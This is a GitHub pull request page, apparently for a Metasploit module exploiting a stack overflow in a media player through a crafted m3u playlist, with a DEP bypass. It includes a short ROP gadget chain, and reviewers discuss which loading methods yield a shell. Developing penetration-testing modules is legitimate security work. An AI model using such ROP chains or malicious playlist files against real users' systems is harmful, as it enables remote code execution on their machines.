New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add module for BID-46926 #2910
Add module for BID-46926 #2910
Conversation
0xffffec4e, # Value to negate, will become 0x00005041 | ||
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll] | ||
0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll] | ||
0x41414141, # Filler (compensate) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'm sure this works fine, but could you please randomize this a little bit? Usually this is how we do it:
# Returns an integer that's used as a 4-byte ROP junk (or compensator, whatever it's called)
def junk
rand_text_alpha(4).unpack("V").first
end
So. Good news and bad news for you. The good news, I got a shell while testing this exploit:
The bad news: I only get a shell when I drag and drop the m3u file to the interface. If I first go to "Playst" -> "Add File" and add the m3u file to the list, double click on the m3u file, it will crash. Haven't looked into the root cause of that yet, but I'm guessing it just requires a different memory layout. So how did you test yours? |
I am testing it by clicking on that little something in the top left corner which brings up the menu then I choose File -> Open or just simply press Ctrl+O and select the file. I did not try the scenario you mention. |
@wchen-r7, I have made the modifications you mentioned. |
Just verifying some scenarios here:
Yup, this scenario works for me.
This works for me, too. So apparently the only scenario that doesn't work is when you first bring up the playlist menu, and load the malicious file from there. |
And you also mentioned drag & drop as a working scenario, that counts for three. The fourth scenario (loading via the playlist menu) seems to be a different issue and not just different memory layout, I mean no stack overflow there... In this scenario the program attempts to iterate trough the playlist. If I use a correct and existing URL the app plays the file, but if I break the address by changing only one character, it crashes. I took a look on the source and the crash occurs when it attempts to check the protocol in the 'filename' (which would be our URL entry), but that is actually nulled out so it crashes. |
This PR attempts to rescue a module which I found in the unstable branch, see the original feature request. This module is a complete rewrite with DEP bypass functionality. The vulnerable app here can be downloaded from Exploit-DB.
Test run results below: